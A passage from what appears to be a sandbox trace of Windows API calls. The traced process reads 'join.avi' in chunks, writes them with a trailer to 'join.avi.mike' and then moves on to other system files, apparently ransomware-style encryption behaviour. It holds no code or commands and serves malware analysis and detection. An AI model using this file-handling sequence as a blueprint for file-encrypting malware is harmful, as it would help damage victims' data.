Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.920] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.920] GetFileType (hFile=0x264) returned 0x1 [0044.920] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.920] GetFileType (hFile=0x264) returned 0x1 [0044.920] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x23000 [0044.920] ReadFile (in: hFile=0x264, lpBuffer=0x210428c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x210428c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.921] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.921] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.922] GetFileType (hFile=0x264) returned 0x1 [0044.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.922] GetFileType (hFile=0x264) returned 0x1 [0044.922] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x23220 [0044.922] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.922] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.922] GetFileType (hFile=0x264) returned 0x1 [0044.922] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.922] GetFileType (hFile=0x264) returned 0x1 [0044.922] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x25800 [0044.922] ReadFile (in: hFile=0x264, lpBuffer=0x211122c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x211122c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.924] GetFileType (hFile=0x264) returned 0x1 [0044.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.924] GetFileType (hFile=0x264) returned 0x1 [0044.924] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x25a20 [0044.924] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.925] GetFileType (hFile=0x264) returned 0x1 [0044.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.925] GetFileType (hFile=0x264) returned 0x1 [0044.925] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x28000 [0044.925] ReadFile (in: hFile=0x264, lpBuffer=0x211e1cc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x211e1cc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.926] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.926] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.926] GetFileType (hFile=0x264) returned 0x1 [0044.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.926] GetFileType (hFile=0x264) returned 0x1 [0044.926] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28220 [0044.927] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.927] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.927] GetFileType (hFile=0x264) returned 0x1 [0044.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.927] GetFileType (hFile=0x264) returned 0x1 [0044.927] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a800 [0044.927] ReadFile (in: hFile=0x264, lpBuffer=0x212b16c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x212b16c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.931] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.931] GetFileType (hFile=0x264) returned 0x1 [0044.931] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.931] GetFileType (hFile=0x264) returned 0x1 [0044.931] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2aa20 [0044.932] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.932] GetFileType (hFile=0x264) returned 0x1 [0044.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.932] GetFileType (hFile=0x264) returned 0x1 [0044.932] ReadFile (in: hFile=0x264, lpBuffer=0x213810c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x213810c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.933] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.933] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.933] GetFileType (hFile=0x264) returned 0x1 [0044.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.933] GetFileType (hFile=0x264) returned 0x1 [0044.933] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d220 [0044.934] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.934] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.934] GetFileType (hFile=0x264) returned 0x1 [0044.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.934] GetFileType (hFile=0x264) returned 0x1 [0044.934] ReadFile (in: hFile=0x264, lpBuffer=0x21450ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21450ac*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.935] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.935] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.935] GetFileType (hFile=0x264) returned 0x1 [0044.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.936] GetFileType (hFile=0x264) returned 0x1 [0044.936] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2fa20 [0044.936] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.936] GetFileType (hFile=0x264) returned 0x1 [0044.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.936] GetFileType (hFile=0x264) returned 0x1 [0044.936] ReadFile (in: hFile=0x264, lpBuffer=0x215204c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x215204c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0044.937] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.938] GetFileType (hFile=0x264) returned 0x1 [0044.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.938] GetFileType (hFile=0x264) returned 0x1 [0044.938] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x32220 [0044.938] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.938] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0044.938] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.938] GetFileType (hFile=0x264) returned 0x1 [0044.938] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0044.938] GetFileType (hFile=0x264) returned 0x1 [0044.938] ReadFile (in: hFile=0x264, lpBuffer=0x215efec, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x215efec*, lpNumberOfBytesRead=0x2af080*=0x1c00, lpOverlapped=0x0) returned 1 [0044.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0044.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.940] GetFileType (hFile=0x264) returned 0x1 [0044.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0044.940] GetFileType (hFile=0x264) returned 0x1 [0044.940] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x34a20 [0044.940] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.940] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0044.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0044.940] GetFileType (hFile=0x264) returned 0x1 [0044.940] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0044.941] GetFileType (hFile=0x264) returned 0x1 [0044.941] WriteFile (in: hFile=0x264, lpBuffer=0x216b08c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x216b08c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0044.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0044.942] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f13120, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4f13120, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4fd1800, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36620)) returned 1 [0044.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0044.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0044.942] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x216c78c | out: lpFileInformation=0x216c78c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f13120, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4f13120, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4fd1800, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36620)) returned 1 [0044.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0044.942] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", dwFileAttributes=0x80) returned 0 [0044.943] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0044.944] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4f13120, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4f13120, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4fd1800, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x36620)) returned 1 [0044.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0044.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", lpFilePart=0x0) returned 0x41 [0044.944] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike", lpFilePart=0x0) returned 0x46 [0044.944] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.mike")) returned 1 [0044.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", lpFilePart=0x0) returned 0x47 [0044.948] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", lpFilePart=0x0) returned 0x44 [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", lpFilePart=0x0) returned 0x4a [0044.949] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft 